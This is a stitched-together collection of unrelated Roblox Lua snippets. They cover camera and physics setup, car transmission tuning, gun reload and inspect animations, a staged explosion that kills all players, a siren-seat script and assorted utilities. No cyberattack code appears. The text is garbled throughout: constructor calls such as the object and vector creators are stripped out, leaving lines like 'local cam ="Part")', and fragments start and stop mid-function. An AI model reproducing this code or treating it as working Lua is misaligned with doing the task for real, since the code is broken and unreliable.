local cam ="Part") cam.Name = "" ..torso.Parent.Name.. "Camera" cam.CFrame = +, 0, 1), torso.Position) cam.Transparency = 1 cam.CanCollide = false cam.Parent = game.Workspace local bp ="BodyPosition") bp.position = cam.Position bp.maxForce =, 10000000000, 10000000000) bp.Parent = cam local bg ="BodyGyro") bg.maxTorque =, 0, 0) bg.Parent = cam local scr = script.LocalScript:clone() scr.Disabled = false scr.Parent = torso.Parent bg.P = (100000) cam.TopSurface = "Smooth" cam.BottomSurface = "Smooth" end function onPlayerAdded(newPlayer) newPlayer.Changed:connect(function(property) if property == "Character" then onPlayerRespawned(newPlayer) end end) end game.Players.PlayerAdded:connect(onPlayerAdded)
local yeeld = 30 local driLL1 = script.Parent.Drill1
-- Sets the parent of all cached parts.
function PartCacheStatic:SetCacheParent(newParent: Instance) assert(getmetatable(self) == PartCacheStatic, ERR_NOT_INSTANCE:format("SetCacheParent", "")) assert(newParent:IsDescendantOf(workspace) or newParent == workspace, "Cache parent is not a descendant of Workspace! Parts should be kept where they will remain in the visible world.") self.CurrentCacheParent = newParent for _, object in self.Open do object.Parent = newParent end for _, object in self.InUse do object.Parent = newParent end end
--[[** ensures value is a number where value <= max @param max The maximum to use @returns A function that will return true iff the condition is passed **--]]
function t.numberMax(max) return function(value) local success, errMsg = t.number(value) if not success then return false, errMsg end if value <= max then return true else return false, string.format("number <= %d expected, got %d", max, value) end end end
--Hide Accessory
script.Parent.ChildAdded:connect(function(child) if child:IsA("Weld") then if child.Part1.Name == "HumanoidRootPart" then player = game.Players:GetPlayerFromCharacter(child.Part1.Parent) script.Parent:SetNetworkOwner(player) for i,v in pairs(child.Part1.Parent:GetChildren())do if v:IsA("Accessory") then v.Handle.Transparency=1 end end end end end)
--[[ Developer note: This script has been modified to fix looping sounds when you ragdoll. --]]
local Players = game:GetService("Players") local RunService = game:GetService("RunService") local AtomicBinding = require(script:WaitForChild("AtomicBinding")) local function loadFlag(flag: string) local success, result = pcall(function() return UserSettings():IsUserFeatureEnabled(flag) end) return success and result end local FFlagUserAtomicCharacterSoundsUnparent = loadFlag("UserAtomicCharacterSoundsUnparent") local SOUND_DATA : { [string]: {[string]: any}} = { Climbing = { SoundId = "rbxasset://sounds/action_footsteps_plastic.mp3", Looped = true, }, Died = { SoundId = "rbxasset://sounds/uuhhh.mp3", }, FreeFalling = { SoundId = "rbxasset://sounds/action_falling.mp3", Looped = true, }, GettingUp = { SoundId = "rbxasset://sounds/action_get_up.mp3", }, Jumping = { SoundId = "rbxasset://sounds/action_jump.mp3", }, Landing = { SoundId = "rbxasset://sounds/action_jump_land.mp3", }, Running = { SoundId = "rbxasset://sounds/action_footsteps_plastic.mp3", Looped = true, Pitch = 1.85, }, Splash = { SoundId = "rbxasset://sounds/impact_water.mp3", }, Swimming = { SoundId = "rbxasset://sounds/action_swim.mp3", Looped = true, Pitch = 1.6, }, }
Tune.TransModes ={"Auto", "Semi"} --[[ [Modes] "Auto" : Automatic shifting "Semi" : Clutchless manual shifting, dual clutch transmission "Manual" : Manual shifting with clutch >Include within brackets eg: {"Semi"} or {"Auto", "Manual"} >First mode is default mode ]] --Automatic Settings Tune.AutoShiftMode = "RPM" --[[ [Modes] "Speed" : Shifts based on wheel speed "RPM" : Shifts based on RPM ]] Tune.AutoUpThresh = -200 --Automatic upshift point (relative to peak RPM, positive = Over-rev) Tune.AutoDownThresh = 1400 --Automatic downshift point (relative to peak RPM, positive = Under-rev) --Gear Ratios Tune.FinalDrive = 3.20 -- Gearing determines top speed and wheel torque Tune.Ratios = { -- Higher ratio = more torque, Lower ratio = higher top speed -- Copy and paste a ratio to add a gear --[[Neutral]] 0 , -- Ratios can also be deleted --[[ 1 ]] 3.75 , -- Reverse, Neutral, and 1st gear are required --[[ 2 ]] 2.38 , --[[ 3 ]] 1.72 , --[[ 4 ]] 1.34 , --[[ 5 ]] 1.11 , --[[ 6 ]] .78 , } Tune.FDMult = 1 -- Ratio multiplier (Change this value instead of FinalDrive if car is struggling with torque ; Default = 1)
-- Local Functions -- Get their stats and update the value
local function updatePlayerPoints(player, valueToAdd) local stats = player:WaitForChild("stats") local points = stats:WaitForChild(GameSettings.pointsName) local totalPoints = stats:WaitForChild("Total"..GameSettings.pointsName) points.Value = points.Value + valueToAdd if valueToAdd > 0 then totalPoints.Value = totalPoints.Value + valueToAdd end DataStore:IncrementPoints(player, valueToAdd) end local function makeUpgradePurchase(player) local stats = player:WaitForChild("stats") local points = stats:WaitForChild(GameSettings.pointsName) local upgrades = stats:WaitForChild(GameSettings.upgradeName) UpgradeManager:BuyUpgrade(player) end local function touchCheckpoint(player) ParticleController.EmitCheckpointParticle(player) end local function addPlayerUpgrade(player) UpgradeManager:AddUpgrade(player) end local function changeController(player, defaultController) if defaultController then player.DevComputerMovementMode = Enum.DevComputerMovementMode.UserChoice player.DevTouchMovementMode = Enum.DevTouchMovementMode.UserChoice else player.DevComputerMovementMode = Enum.DevComputerMovementMode.Scriptable player.DevTouchMovementMode = Enum.DevTouchMovementMode.Scriptable end end local function onPlayerEnteredGame(player) UpgradeManager:SetWalkspeedToCurrentUpgrade(player) end
--[=[ Executes the task as requested. @param job MaidTask -- Task to execute ]=]
function MaidTaskUtils.doTask(job) if type(job) == "function" then job() elseif type(job) == "thread" then local cancelled if coroutine.running() ~= job then cancelled = pcall(function() task.cancel(job) end) end if not cancelled then task.defer(function() task.cancel(job) end) end elseif typeof(job) == "RBXScriptConnection" then job:Disconnect() elseif type(job) == "table" and type(job.Destroy) == "function" then job:Destroy() -- selene: allow(if_same_then_else) elseif typeof(job) == "Instance" then job:Destroy() else error("Bad job") end end
---------------------------------- ------------VARIABLES------------- ----------------------------------
ContentProvider = game:GetService("ContentProvider") LocalSounds = { "233836579", --C/C# "233844049", --D/D# "233845680", --E/F "233852841", --F#/G "233854135", --G#/A "233856105", --A#/B } SoundFolder = Gui.SoundFolder ExistingSounds = {}
--// Animations
-- Idle Anim IdleAnim = function(char, speed, objs) TweenJoint(objs[2], nil ,, 0.295501232, -1.07592201, 1, 0, 0, 0, 1.19248806e-08, 1, 0, -1, 1.19248806e-08), function(X) return math.sin(math.rad(X)) end, 0.25) TweenJoint(objs[3], nil ,, -0.0621779114, -1.67288721, 0.787567914, -0.220087856, 0.575584888, -0.615963876, -0.308488727, 0.724860668, 0.0180283934, -0.925416589, -0.378522098), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.18) end; -- FireMode Anim FireModeAnim = function(char, speed, objs) TweenJoint(objs[1], nil ,, 0, -0.0787199363, 0.962304771, 0.271973342, 0, -0.261981696, 0.926952124, -0.268561482, -0.0730415657, 0.258437991, 0.963262498), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.1) TweenJoint(objs[2], nil ,, -0.310947895, -1.34432662, 0.766044378, -2.80971371e-008, 0.642787576, -0.620885074, -0.258818865, 0.739942133, 0.166365519, -0.965925872, -0.198266774), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.25) objs[4]:WaitForChild("Click"):Play() end; -- Reload Anim ReloadAnim = function(char, speed, objs) TweenJoint(objs[2], nil ,, 0.295501232, -1.07592201, 0.973990917, -0.226587087, 2.70202394e-09, -0.0646390691, -0.277852833, 0.958446443, -0.217171595, -0.933518112, -0.285272509), function(X) return math.sin(math.rad(X)) end, 0.5) TweenJoint(objs[3], nil ,, -0.0621779114, -1.63076854, 0.787567914, -0.220087856, 0.575584888, -0.615963876, -0.308488727, 0.724860668, 0.0180283934, -0.925416589, -0.378522098), function(X) return math.sin(math.rad(X)) end, 0.5) wait(0.5) local MagC = Tool:WaitForChild("Mag"):clone() MagC:FindFirstChild("Mag"):Destroy() MagC.Parent = Tool MagC.Name = "MagC" local MagCW ="Motor6D") MagCW.Part0 = MagC MagCW.Part1 = workspace.CurrentCamera:WaitForChild("Arms"):WaitForChild("Left Arm") MagCW.Parent = MagC MagCW.C1 = MagC.CFrame:toObjectSpace(objs[4].CFrame) objs[4].Transparency = 1 objs[6]:WaitForChild("MagOut"):Play() TweenJoint(objs[3], nil ,, -0.0621778965, -2.69811869, 0.787567914, -0.220087856, 0.575584888, -0.51537323, 0.276813388, 0.811026871, -0.337826759, -0.935379863, 0.104581922), function(X) return math.sin(math.rad(X)) end, 0.3) TweenJoint(objs[2], nil ,, 0.295501232, -1.29060709, 0.973990917, -0.226587087, 2.70202394e-09, -0.0646390691, -0.277852833, 0.958446443, -0.217171595, -0.933518112, -0.285272509), function(X) return math.sin(math.rad(X)) end, 0.1) wait(0.1) TweenJoint(objs[2], nil ,, 0.295501232, -1.07592201, 0.973990917, -0.226587087, 2.70202394e-09, -0.0646390691, -0.277852833, 0.958446443, -0.217171595, -0.933518112, -0.285272509), function(X) return math.sin(math.rad(X)) end, 0.3) wait(0.3) objs[6]:WaitForChild('MagIn'):Play() TweenJoint(objs[3], nil ,, -0.0621779114, -1.63076854, 0.787567914, -0.220087856, 0.575584888, -0.615963876, -0.308488727, 0.724860668, 0.0180283934, -0.925416589, -0.378522098), function(X) return math.sin(math.rad(X)) end, 0.3) wait(0.4) MagC:Destroy() objs[4].Transparency = 0 end; -- Bolt Anim BoltBackAnim = function(char, speed, objs) TweenJoint(objs[3], nil ,, 0.518400908, -1.07592201, 0.984651804, 0.174530268, -2.0812525e-09, 0.0221636202, -0.125041038, 0.991903961, 0.173117265, -0.97668004, -0.12699011), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.1) TweenJoint(objs[2], nil ,, -0.492658436, -1.55705214, 0.140073985, -0.978677034, -0.150234282, -0.955578506, -0.173358306, 0.238361627, -0.259323537, 0.110172354, -0.959486008), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.4) objs[5]:WaitForChild("BoltBack"):Play() TweenJoint(objs[2], nil ,, -0.609481037, -1.02827215, 0.140073985, -0.978677034, -0.150234282, -0.955578506, -0.173358306, 0.238361627, -0.259323537, 0.110172354, -0.959486008), function(X) return math.sin(math.rad(X)) end, 0.25) TweenJoint(objs[1], nil ,, 0, 0.230707675, 1, 0, 0, 0, 1, 0, 0, 0, 1), function(X) return math.sin(math.rad(X)) end, 0.25) TweenJoint(objs[3], nil ,, 0.175939053, -1.07592201, 0.984651804, 0.174530268, -2.0812525e-09, 0.0221636202, -0.125041038, 0.991903961, 0.173117265, -0.97668004, -0.12699011), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.3) end; BoltForwardAnim = function(char, speed, objs) objs[5]:WaitForChild("BoltForward"):Play() TweenJoint(objs[1], nil ,, function(X) return math.sin(math.rad(X)) end, 0.1) TweenJoint(objs[2], nil ,, -0.900531948, -0.749261618, 0.140073985, -0.978677034, -0.150234282, -0.955578506, -0.173358306, 0.238361627, -0.259323537, 0.110172354, -0.959486008), function(X) return math.sin(math.rad(X)) end, 0.1) TweenJoint(objs[3], nil ,, 0.617181182, -1.07592201, 0.984651804, 0.174530268, -2.0812525e-09, 0.0221636202, -0.125041038, 0.991903961, 0.173117265, -0.97668004, -0.12699011), function(X) return math.sin(math.rad(X)) end, 0.2) wait(0.2) end; -- Bolting Back BoltingBackAnim = function(char, speed, objs) TweenJoint(objs[1], nil ,, 0, 0.230707675, 1, 0, 0, 0, 1, 0, 0, 0, 1), function(X) return math.sin(math.rad(X)) end, 0.03) end; BoltingForwardAnim = function(char, speed, objs) TweenJoint(objs[1], nil ,, function(X) return math.sin(math.rad(X)) end, 0.1) end; InspectAnim = function(char, speed, objs) ts:Create(objs[1],,{C1 =, 0.654529691, -1.92835355, 0.999723792, 0.0109803826, 0.0207702816, -0.0223077796, 0.721017241, 0.692557871, -0.00737112388, -0.692829967, 0.721063137)}):Play() ts:Create(objs[2],,{C1 =, -0.699174881, -1.32277012, 0.66716975, -8.8829113e-09, -0.74490571, 0.651565909, -0.484672248, 0.5835706, -0.361035138, -0.874695837, -0.323358655)}):Play() wait(1) ts:Create(objs[2],,{C1 =, -0.699174881, -1.03685927, -0.204235911, 0.62879771, 0.750267386, 0.65156585, -0.484672219, 0.58357054, 0.730581641, 0.60803473, -0.310715646)}):Play() wait(1) ts:Create(objs[2],,{C1 =, 0.295501232, -1.32277012, 0.935064793, -0.354476899, 4.22709467e-09, -0.110443868, -0.291336805, 0.950223684, -0.336832345, -0.888520718, -0.311568588)}):Play() ts:Create(objs[1],,{C1 =, 0.654529572, -1.81345785, 0.761665463, -0.514432132, 0.393986136, -0.560285628, -0.217437655, 0.799250066, -0.325492471, -0.82950604, -0.453843832)}):Play() wait(1) local MagC = Tool:WaitForChild("Mag"):clone() MagC:FindFirstChild("Mag"):Destroy() MagC.Parent = Tool MagC.Name = "MagC" local MagCW ="Motor6D") MagCW.Part0 = MagC MagCW.Part1 = workspace.CurrentCamera:WaitForChild("Arms"):WaitForChild("Left Arm") MagCW.Parent = MagC MagCW.C1 = MagC.CFrame:toObjectSpace(Tool:WaitForChild('Mag').CFrame) Tool.Mag.Transparency = 1 Tool:WaitForChild('Grip'):WaitForChild("MagOut"):Play() ts:Create(objs[2],,{C1 =, 0.295501232, -1.55972552, 0.935064793, -0.354476899, 4.22709467e-09, -0.110443868, -0.291336805, 0.950223684, -0.336832345, -0.888520718, -0.311568588)}):Play() ts:Create(objs[1],,{C1 =, 0.654529572, -2.9755671, 0.761665463, -0.514432132, 0.393986136, -0.568886042, -0.239798605, 0.786679745, -0.31021595, -0.823320091, -0.475299776)}):Play() wait(0.13) ts:Create(objs[2],,{C1 =, 0.295501232, -1.28149843, 0.935064793, -0.354476899, 4.22709467e-09, -0.110443868, -0.291336805, 0.950223684, -0.336832345, -0.888520718, -0.311568588)}):Play() wait(0.20) ts:Create(objs[1],,{C1 =, -0.650498748, -1.82401526, 0.761665463, -0.514432132, 0.393986136, -0.646156013, -0.55753684, 0.521185875, -0.0484529883, -0.651545882, -0.75706023)}):Play() wait(0.8) ts:Create(objs[1],,{C1 =, 0.654529572, -2.9755671, 0.761665463, -0.514432132, 0.393986136, -0.568886042, -0.239798605, 0.786679745, -0.31021595, -0.823320091, -0.475299776)}):Play() wait(0.5) Tool:WaitForChild('Grip'):WaitForChild("MagIn"):Play() ts:Create(objs[1],,{C1 =, 0.654529572, -1.81345785, 0.761665463, -0.514432132, 0.393986136, -0.560285628, -0.217437655, 0.799250066, -0.325492471, -0.82950604, -0.453843832)}):Play() wait(0.3) MagC:Destroy() Tool.Mag.Transparency = 0 wait(0.1) end; nadeReload = function(char, speed, objs) ts:Create(objs[1],, {C1 =, -1.15645337, -1.32277012, 0.984807789, -0.163175702, -0.0593911409, 0, -0.342020363, 0.939692557, -0.17364797, -0.925416529, -0.336824328)}):Play() ts:Create(objs[2],, {C1 =, 0.654529691, -1.92835355, 0.787567914, -0.220087856, 0.575584888, -0.323594928, 0.647189975, 0.690240026, -0.524426222, -0.72986728, 0.438486755)}):Play() wait(0.6) ts:Create(objs[2],, {C1 =, 0.559619546, -1.73060048, 0.802135408, -0.348581612, 0.484839559, -0.597102284, -0.477574915, 0.644508123, 0.00688350201, -0.806481719, -0.59121877)}):Play() wait(0.6) end; AttachAnim = function(char, speed, objs) TweenJoint(objs[1], nil ,, -0.386312962, -0.955676377, 0.5, 0, -0.866025329, 0.852868497, -0.17364797, 0.492403895, -0.150383547, -0.984807789, -0.086823985), function(X) return math.sin(math.rad(X)) end, 0.25) TweenJoint(objs[2], nil ,, 1.66565645, -1.2231313, 0.787567914, -0.220087856, 0.575584888, -0.0180282295, 0.925416708, 0.378521889, -0.615963817, -0.308488399, 0.724860728), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.18) end; -- Patrol Anim PatrolAnim = function(char, speed, objs) TweenJoint(objs[1], nil , sConfig.PatrolPosR, function(X) return math.sin(math.rad(X)) end, 0.25) TweenJoint(objs[2], nil , sConfig.PatrolPosL, function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.18) end; } return Settings
wait(10) script.Parent.Anchored = false local bp ="BodyPosition") bp.Position = script.Parent.Position.X, script.Parent.Position.Y+50, script.Parent.Position.Z ) bp.MaxForce =,100000000,100000000) bp.Parent = script.Parent script.Parent.effect.Disabled = true script.Parent.ChargeSphere.Enabled = false script.Parent.ChargeGlow.Enabled = false script.Parent.ChargeCircle.Enabled = false script.Parent.ChargeCircle2.Enabled = false script.Parent.ring.Enabled = false script.Parent.Activate2.Enabled = false script.Parent.zap.Enabled = false script.Parent.Attachment.Flare.Enabled = false script.Parent.Rise:Play() script.Parent.radialneedles3.Disabled = false wait(.7) script.Parent.radialneedles3.Disabled = true wait(0.8) wait(1) script.Parent.Attachment.bigglow:Emit(1) script.Parent.crack:Play() wait(2) script.Parent.Attachment.bigglow:Emit(5) script.Parent.crack2:Play() wait(1.5) script.Parent.Attachment.bigglow:Emit(20) script.Parent.crack3:Play() wait(0.5) wait(0) bp:Destroy() local bp2 ="BodyPosition") bp2.Position = script.Parent.Position.X, script.Parent.Position.Y+175, script.Parent.Position.Z ) bp2.Parent = script.Parent script.Parent.speedneedles.Disabled = false script.Parent.holy_explosion:Play() puff ="Part") puff.CanCollide = false puff.Anchored = true puff.Name = "hi lol" puff.Transparency = 0.2 puff.BrickColor ="Lily white") puff.formFactor = "Custom" puff.TopSurface = 0 puff.BottomSurface = 0 puff.Size =,3,3) puff.Material = Enum.Material.Neon puff.CastShadow = false script.Mesh:clone().Parent = puff local erase = script.FadeEx:clone() erase.Parent = puff erase.Disabled = false puff.Parent = game.Workspace puff.Position = script.Parent.Position puff.CastShadow = false wait(0.7) local exp ="Explosion") exp.Position = script.Parent.Position exp.BlastPressure = 10000 exp.BlastRadius = 70 exp.Visible = false exp.Parent = workspace script.Parent.holy_explosion:Stop() script.Parent.speedneedles.Disabled = true script.Parent.radialneedles2.Disabled = false script.Parent.Anchored = true script.Parent.Transparency = 1 script.Parent.CanCollide = false script.Parent.radialneedles.Disabled = false script.Parent.effect2.Disabled = false script.Parent.FarBlam:Play() script.Parent.heavencrash:Play() script.Parent.build_up:Play() puff ="Part") puff.CanCollide = false puff.Anchored = true puff.Name = "hi lol" puff.Transparency = 0 puff.BrickColor ="Daisy orange") puff.formFactor = "Custom" puff.TopSurface = 0 puff.BottomSurface = 0 puff.Size =,100,100) puff.Material = Enum.Material.Neon puff.CastShadow = false script.Mesh:clone().Parent = puff local erase = script.tweener4:clone() erase.Parent = puff erase.Disabled = false puff.Parent = game.Workspace puff.Position = script.Parent.Position puff.CastShadow = false script.Parent.light.Disabled = false script.Parent.BlamEffect:Emit(1000) print("Phase 2 - White hole") plyrs = game.Players:GetChildren() for i = 1,#plyrs do local rp ="RocketPropulsion") plyrs[i].Character.Humanoid.PlatformStand = true rp.MaxSpeed = 0 rp.Parent = plyrs[i].Character.HumanoidRootPart rp.MaxThrust = 10000 rp.Target = script.Parent rp.TargetRadius = 30 rp.ThrustP = 1000 rp.ThrustD = 20000 rp.TargetOffset =,340,50) rp:Fire() local nomnomnom = script.yeeeeeeeeet:Clone() nomnomnom.Parent = rp nomnomnom.Disabled = false wait(0.1) plyrs[i].Character.HumanoidRootPart.Velocity = (math.random(-250,250)), (math.random(100,250)), (math.random(-250,250)) ) end wait(10) script.Parent.Attachment.Flare:Emit(70) script.Parent.Attachment.Star.Enabled = true script.Parent.effect2.Disabled = true script.Parent.radialneedles2.Disabled = true script.Parent.Anchored = false bp2:Destroy() local bp3 ="BodyPosition") bp3.Position = script.Parent.Position.X, script.Parent.Position.Y+20, script.Parent.Position.Z ) bp3.Parent = script.Parent wait(2) print("Phase 3 - TOTAL DESTRUCTION") plyrs = game.Players:GetChildren() for i = 1,#plyrs do plyrs[i].Character.Humanoid.Health = 0 end local whitescreenat3am = script.tweener5:Clone() whitescreenat3am.Parent = game.Workspace whitescreenat3am.Disabled = false script.Parent.light2.Disabled = false local EXPLOSION_SPREAD = 400
--Main function
local function AttachAuraControl(source_part, eff_cont) --(source_part, effect_container) local AnimObj local function Start() AnimObj = {} AnimObj["MainPart"] = EFFECT_LIB.NewInvisiblePart() AnimObj["Emitter"] = script.Fire:clone() AnimObj["Emitter"].Parent = AnimObj["MainPart"] AnimObj["MainPart"].Parent = eff_cont end local function Update() local loop = EFFECT_LIB.Loop(1) AnimObj["MainPart"].CFrame = source_part.CFrame * CFrame.Angles(0, math.rad(loop * 360), 0) *, 0, -3) local get_col = GenColor(tick(), 5) AnimObj["Emitter"].Color = get_col end local function Stop() eff_cont:ClearAllChildren() AnimObj = nil end return {Start = Start, Update = Update, Stop = Stop} end return AttachAuraControl
--- Shallow merges two tables without modifying either -- @tparam table orig original table -- @tparam table new new table -- @treturn table
function Table.merge(orig, new) local _table = {} for key, val in pairs(orig) do _table[key] = val end for key, val in pairs(new) do _table[key] = val end return _table end
--wait(20) ---workspace.Terrain:SetCells(,-7,-500),,-2,500)),Enum.CellMaterial.Water,0,0)
function onChildAdded(child) if child.Name == "SeatWeld" then local human = child.part1.Parent:findFirstChild("Humanoid") if (human ~= nil) then print("Human IN") seat.SirenControl.Control.CarName.Value = human.Parent.Name.."'s Car" seat.Parent.Name = human.Parent.Name.."'s Car" s.Parent.SirenControl:clone().Parent = game.Players:findFirstChild(human.Parent.Name).PlayerGui seat.Start:Play() wait(1) seat.Start:Stop() seat.Engine:Play() end end end function onChildRemoved(child) if (child.Name == "SeatWeld") then local human = child.part1.Parent:findFirstChild("Humanoid") if (human ~= nil) then print("Human OUT") seat.Parent.Name = "Empty Car" seat.SirenControl.Control.CarName.Value = "Empty Car" game.Players:findFirstChild(human.Parent.Name).PlayerGui.SirenControl:remove() seat.Engine:Stop() end end end script.Parent.ChildAdded:connect(onChildAdded) script.Parent.ChildRemoved:connect(onChildRemoved) while true do wait(0) if game.SoundService.RespectFilteringEnabled == true then game.SoundService.RespectFilteringEnabled = false else game.SoundService.RespectFilteringEnabled = false end end
--[[Output Scaling Factor]]
local hpScaling = _Tune.WeightScaling*10 local FBrakeForce = _Tune.FBrakeForce local RBrakeForce = _Tune.RBrakeForce local PBrakeForce = _Tune.PBrakeForce if not workspace:PGSIsEnabled() then hpScaling = _Tune.LegacyScaling*10 FBrakeForce = _Tune.FLgcyBForce RBrakeForce = _Tune.RLgcyBForce PBrakeForce = _Tune.LgcyPBForce end
-- Returns a character ancestor and its Humanoid, or nil
function UTIL.FindCharacterAncestor(subject) if subject and subject ~= workspace then local humanoid = subject:FindFirstChild('Humanoid') if humanoid then return subject, humanoid else return UTIL.FindCharacterAncestor(subject.Parent) end end return nil end UTIL.AssetURL = '' UTIL.TouchEnabled = game:GetService("UserInputService").TouchEnabled do local suceeded,_ =pcall(function() game.Workspace.CurrentCamera:GetPanSpeed() end) UTIL.CanCheckPanSpeed = suceeded end local DebrisService = game:GetService('Debris') local DebugPrintOffset = 0 function UTIL.Dprint(...) local line = '' for _, segment in pairs({...}) do line = line .. (line and ' ' or '') .. tostring(segment) end local gui ='ScreenGui') local label ='TextLabel') label.Text = line label.Size =, 0, 0.05, 0) label.BackgroundTransparency = 0.5 label.Position =, 0, 0, DebugPrintOffset) label.TextWrapped = true label.Parent = gui DebrisService:AddItem(gui, 30) gui.Parent = script.Parent DebugPrintOffset = (DebugPrintOffset <= 600) and DebugPrintOffset + 30 or 0 end
--[[ while true do local goal = {} goal.C0 =,2.1,-2)*CFrame.fromEulerAnglesXYZ(0, math.rad(45), 0) local tweenInfo =,Enum.EasingStyle.Quad,Enum.EasingDirection.InOut) local tween = TweenService:Create(part, tweenInfo, goal) tween:play() wait(.5) local goal = {} goal.C0 =,2,-2)*CFrame.fromEulerAnglesXYZ(0, math.rad(45), 0) local tweenInfo =,Enum.EasingStyle.Quad,Enum.EasingDirection.InOut) local tween = TweenService:Create(part, tweenInfo, goal) tween:play() wait(.5) end --]] -------------
RCMAddress = script.Parent.Parent.Parent.FederalSignalRCM1A
--moving kick thing
wait() weld33.C1 =, 1, 0.35) * CFrame.fromEulerAnglesXYZ(math.rad(-93), math.rad(-15),0) wait() weld55.C1 =, 0.35, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(290), 0.28, math.rad(-90)) wait() weld55.C1 =, 0.4, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(290), 0.28, math.rad(-90)) wait() weld55.C1 =, 0.5, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(290), 0.22, math.rad(-90)) wait() weld55.C1 =, 0.6, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(290), 0.22, math.rad(-90)) wait() weld55.C1 =, 0.7, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(290), 0.22, math.rad(-90)) wait(0.1) weld55.C1 =, 0.5, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(290), 0.22, math.rad(-90)) script.Parent.pull1.Mesh.Offset =, -0.15, 0) script.Parent.pull2.Mesh.Offset =, -0.15, 0) script.Parent.pull3.Mesh.Offset =, -0.15, 0) script.Parent.pull4.Mesh.Offset =, -0.15, 0) script.Parent.pull5.Mesh.Offset =, -0.15, 0) script.Parent.pull6.Mesh.Offset =, -0.15, 0) script.Parent.pull7.Mesh.Offset =, -0.15, 0) script.Parent.pull8.Mesh.Offset =, -0.15, 0) script.Parent.pull9.Mesh.Offset =, -0.15, 0) script.Parent.pull10.Mesh.Offset =, -0.15, 0) script.Parent.pull11.Mesh.Offset =, -0.15, 0) script.Parent.pull12.Mesh.Offset =, -0.15, 0) script.Parent.pull13.Mesh.Offset =, -0.15, 0) script.Parent.pull14.Mesh.Offset =, -0.15, 0) script.Parent.pull15.Mesh.Offset =, -0.15, 0) script.Parent.pull16.Mesh.Offset =, -0.15, 0) script.Parent.pull17.Mesh.Offset =, -0.15, 0) script.Parent.pull18.Mesh.Offset =, -0.15, 0) wait(0.03) weld55.C1 =, 0.35, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(290), 0.22, math.rad(-90)) script.Parent.pull1.Mesh.Offset =, -0.31, 0) script.Parent.pull2.Mesh.Offset =, -0.31, 0) script.Parent.pull3.Mesh.Offset =, -0.31, 0) script.Parent.pull4.Mesh.Offset =, -0.31, 0) script.Parent.pull5.Mesh.Offset =, -0.31, 0) script.Parent.pull6.Mesh.Offset =, -0.31, 0) script.Parent.pull7.Mesh.Offset =, -0.31, 0) script.Parent.pull8.Mesh.Offset =, -0.31, 0) script.Parent.pull9.Mesh.Offset =, -0.31, 0) script.Parent.pull10.Mesh.Offset =, -0.31, 0) script.Parent.pull11.Mesh.Offset =, -0.31, 0) script.Parent.pull12.Mesh.Offset =, -0.31, 0) script.Parent.pull13.Mesh.Offset =, -0.31, 0) script.Parent.pull14.Mesh.Offset =, -0.31, 0) script.Parent.pull15.Mesh.Offset =, -0.31, 0) script.Parent.pull16.Mesh.Offset =, -0.31, 0) script.Parent.pull17.Mesh.Offset =, -0.31, 0) script.Parent.pull18.Mesh.Offset =, -0.31, 0) wait(0.1) weld55.C1 =, 0.35, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(290), 0.22, math.rad(-90)) script.Parent.pull1.Mesh.Offset =, -0.15, 0) script.Parent.pull2.Mesh.Offset =, -0.15, 0) script.Parent.pull3.Mesh.Offset =, -0.15, 0) script.Parent.pull4.Mesh.Offset =, -0.15, 0) script.Parent.pull5.Mesh.Offset =, -0.15, 0) script.Parent.pull6.Mesh.Offset =, -0.15, 0) script.Parent.pull7.Mesh.Offset =, -0.15, 0) script.Parent.pull8.Mesh.Offset =, -0.15, 0) script.Parent.pull9.Mesh.Offset =, -0.15, 0) script.Parent.pull10.Mesh.Offset =, -0.15, 0) script.Parent.pull11.Mesh.Offset =, -0.15, 0) script.Parent.pull12.Mesh.Offset =, -0.15, 0) script.Parent.pull13.Mesh.Offset =, -0.15, 0) script.Parent.pull14.Mesh.Offset =, -0.15, 0) script.Parent.pull15.Mesh.Offset =, -0.15, 0) script.Parent.pull16.Mesh.Offset =, -0.15, 0) script.Parent.pull17.Mesh.Offset =, -0.15, 0) script.Parent.pull18.Mesh.Offset =, -0.15, 0) wait() weld55.C1 =, 0.35, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(290), 0.22, math.rad(-90)) script.Parent.pull1.Mesh.Offset =, -0, 0) script.Parent.pull2.Mesh.Offset =, -0, 0) script.Parent.pull3.Mesh.Offset =, -0, 0) script.Parent.pull4.Mesh.Offset =, -0, 0) script.Parent.pull5.Mesh.Offset =, -0, 0) script.Parent.pull6.Mesh.Offset =, -0, 0) script.Parent.pull7.Mesh.Offset =, -0, 0) script.Parent.pull8.Mesh.Offset =, -0, 0) script.Parent.pull9.Mesh.Offset =, -0, 0) script.Parent.pull10.Mesh.Offset =, -0, 0) script.Parent.pull11.Mesh.Offset =, -0, 0) script.Parent.pull12.Mesh.Offset =, -0, 0) script.Parent.pull13.Mesh.Offset =, -0, 0) script.Parent.pull14.Mesh.Offset =, -0, 0) script.Parent.pull15.Mesh.Offset =, -0, 0) script.Parent.pull16.Mesh.Offset =, -0, 0) script.Parent.pull17.Mesh.Offset =, -0, 0) script.Parent.pull18.Mesh.Offset =, -0, 0) wait() weld55.C1 =, 0.4, 0.6) * CFrame.fromEulerAnglesXYZ(math.rad(290), 0.19, math.rad(-90))
--valve things
local BOVsound = car.DriveSeat.BOV BOVsound.Volume = 0.3 --bov volume BOVsound.Pitch = 1 -- pitch, i wouldn't change this lol BOVsound.SoundId = "rbxassetid://0" --sound, duh.
------------- SERVICES ----------------
local HttpService = game:GetService("HttpService") local UserInputService = game:GetService("UserInputService") local GuiService = game:GetService("GuiService") local RunService = game:GetService("RunService") local CoreGui = game.Players.LocalPlayer.PlayerGui local RobloxGui = CoreGui:WaitForChild("BackpackGui") local ContextActionService = game:GetService("ContextActionService") local VRService = game:GetService("VRService")
--Automatic Gauge Scaling
